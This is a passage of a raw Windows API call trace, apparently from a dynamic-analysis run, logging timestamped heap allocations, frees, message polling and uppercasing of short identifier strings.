RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0265.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0265.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0265.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0265.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0265.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0265.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0265.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0265.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0265.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0265.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0265.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0265.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0265.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0265.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0265.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0265.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0265.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0265.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0265.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0265.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0265.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0265.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0265.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0265.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0265.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0265.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0265.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0265.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0265.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0265.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0265.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0265.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0265.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0265.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0265.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0265.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0265.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0265.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0265.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0265.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0265.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0265.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0265.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0265.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0265.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0265.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0265.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0265.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0265.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0265.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0265.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0265.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0265.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0265.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0265.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0265.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0265.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0265.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0265.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0265.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0265.055] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0265.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0265.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0265.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0265.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0265.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0265.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0265.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0265.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0265.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0265.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0265.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0265.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0265.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0265.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0265.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0265.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0265.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0265.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0265.056] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0265.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0265.056] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0265.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0265.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0265.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0265.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1778 [0265.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0265.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0265.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0265.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0265.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0265.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0265.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0265.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0265.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0265.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0265.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0265.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0265.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0265.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0265.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e28 [0265.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0265.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0265.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0265.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0265.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0265.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0265.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0265.057] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0265.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0265.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0265.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0265.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0265.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0265.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0265.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0265.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0265.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0265.058] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0265.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0265.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0265.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0265.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0265.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0265.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0265.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0265.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0265.058] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0265.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0265.058] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0265.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0265.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0265.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0265.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0265.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0265.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0265.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0265.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0265.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0265.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0265.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0265.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0265.059] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0265.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0265.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0265.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0265.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0265.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0265.059] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.059] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.060] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0265.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0265.060] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0265.060] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0265.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0265.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0265.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0265.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0265.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0265.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0265.060] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0265.060] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0265.060] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0265.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0265.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0265.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0265.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0265.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0265.060] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0265.060] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0265.061] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0265.061] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0265.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0265.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0265.061] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0265.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0265.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0265.061] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0265.061] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0265.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0265.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0265.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0265.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0265.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0265.062] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0265.062] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.062] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0265.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0265.062] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0265.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0265.062] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0265.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0265.062] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0265.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0265.063] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0265.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0265.063] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0265.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0265.063] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0265.063] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0265.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0265.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0265.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0265.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0265.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0265.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0265.063] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0265.063] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0265.063] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 